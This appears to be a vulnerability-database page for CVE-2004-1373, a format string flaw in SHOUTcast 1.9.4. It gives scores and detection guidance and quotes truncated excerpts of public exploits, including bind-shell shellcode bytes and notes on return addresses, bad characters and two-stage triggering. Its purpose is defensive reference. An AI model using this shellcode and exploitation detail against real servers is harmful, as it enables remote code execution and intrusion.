CVE-2004-1373
Published: 2004-12-23
Priority: P3, 46, high · CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: available (Exploit-DB and Metasploit entries listed on this page)
EPSS: 70.07% (99.3th percentile)
Format string vulnerability in SHOUTcast 1.9.4 allows remote attackers to cause a denial of service (application crash) and execute arbitrary code via format string specifiers in a content URL, as demonstrated in the filename portion of a .mp3 file.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nullsoft | shoutcast_server | — | — |
Detection & IOCs (extracted from sources)
- Bytes: `\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6\xb0\x02\xcd\x80` (matches the start of the bind-shell shellcode, port 7000, in the Linux exploit listed on this page)
- Bytes: `0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB0,0x80,0x36,0xDE,0x46,0xE2,0xFA`
- Detect HTTP GET requests to /content/ paths containing format string specifiers (e.g., %x, %n, %#0) in the filename, particularly in .mp3 file requests.
- Alert on HTTP requests to SHOUTcast (default port 8000) where the URI path under /content/ contains %x, %n, or %#0 format string tokens followed by a .mp3 extension.
- Two-stage exploitation pattern: the first request seeds shellcode in a .mp3 filename path; the second request uses chained %x/%n format specifiers to trigger the overflow. Detect two rapid sequential GET /content/ requests from the same source IP.
- Monitor for outbound connections from the SHOUTcast server process to attacker-controlled ports (1180 for the Windows exploit, 7000 for the Linux exploit) following receipt of a malformed /content/ request, indicating successful shellcode execution.
- Bad characters for payload delivery include null bytes and HTTP special characters; payloads will avoid: \x00 \x3a \x26 \x3f \x25 \x23 \x20 \x0a \x0d \x2f \x2b \x0b \x5c. Signatures should account for encoded shellcode in the URI.
- Check the SHOUTcast server version banner for 'v1.9.4' combined with the 'win32' platform string in HTTP responses to identify vulnerable targets.
- The Windows exploit targets specific msvcrt.dll addresses for XP SP1 and W2K SP4; other service pack levels require different return addresses.
- The Metasploit module uses ws2help.dll and PEB return addresses per target OS; Windows 2003 Server uses a PEB return address (0x7ffc0638) rather than a DLL address.
- The Linux exploit notes that %number$x and %number$n format string variants are filtered by SHOUTcast, requiring use of sequential non-positional %x/%n specifiers instead.
- Payload space is constrained to 250 bytes in the Metasploit module due to the format string buffer construction (1046 - payload length = padding width).
No detection rules found.
Exploit-DB: SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow (Metasploit)
exploitdb · 2010-04-30 · CVE-2004-1373
---
```ruby
##
# $Id: shoutcast_format.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
			'Name'        => 'SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow',
			'Description' => %q{
					This module exploits a format string vulnerability in the
					Nullsoft SHOUTcast server for Windows. The vulnerability is
					triggered by requesting a file path that contains format
					string specifiers. This vulnerability was discovered by
					Tomasz Trojanowski and Damian Put.
```
Exploit-DB: SHOUTcast 1.9.4 (Windows) - File Request Format String Remote Overflow
exploitdb · 2005-02-19 · CVE-2004-1373
---
```c
/*
Object: PoC for Nullsoft SHOUTcast 1.9.4 File Request Format String Vulnerability

From the securityfocus bid at https://www.securityfocus.com/bid/12096 :
"This issue was reported to exist in version 1.9.4 on Linux. It is likely that versions for other
platforms are also affected by the vulnerability, though it is not known to what degree they are
exploitable."
This is now clarified, it's exploitable.

notes: This is a two steps exploitation: the format bug is used to compute a buffer
that will overwrite the stack later, resulting in a SEH overwriting.
The exploit works for both the GUI and the console servers.

greets: Sputnik
`date`: Sat Feb 19 15:48:45 2005
credits: Tomasz Trojanowski
author: mandragore, ma
```
Exploit-DB: SHOUTcast DNAS/Linux 1.9.4 - Format String Remote Overflow
exploitdb · 2004-12-23 · CVE-2004-1373
---
```c
/* SHOUTcast DNAS/Linux v1.9.4 format string remote exploit          */
/* Damian Put Cyber-Crime Team (www.CC-Team.org)                      */
/* Tested on slackware 9.1 and 10.0 (0xbf3feee0)                      */
/* When exploit only crash SHOUTcast we should calculate new address: */
/*                                                                    */
/* bash-2.05b$ gdb sc_serv core                                       */
/* ...                                                                */
/* (gdb) x/x $edi                                                     */
/* 0xbe462270:     0x78257825                                         */
/* (gdb) x/x 0xbe462270-996                                           */
/* 0xbe461e8c:     0x5050c031                                         */
/*                                                                    */
/* 0xbe461e8c - This is our shellcode addr                            */
/*                                                                    */
/* Now we "only" must change format string code in req2 :-)           */
#include
#include
#include
#include
#include
#include
#include
/* Default SHOUTcast port */
#define PORT 8000
char shellcode[] = //bindshellcode (port 7000)
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04
```
Metasploit: SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow
This module exploits a format string vulnerability in the Nullsoft SHOUTcast server for Windows. The vulnerability is triggered by requesting a file path that contains format string specifiers. This vulnerability was discovered by Tomasz Trojanowski and Damian Put.
No writeups or analysis indexed.
References
- http://marc.info/?l=bugtraq&m=110382975516003&w=2
- http://marc.info/?l=bugtraq&m=110886444014745&w=2
- http://securitytracker.com/id?1012675
- http://www.gentoo.org/security/en/glsa/glsa-200501-04.xml
- http://www.securityfocus.com/bid/12096
- https://exchange.xforce.ibmcloud.com/vulnerabilities/18669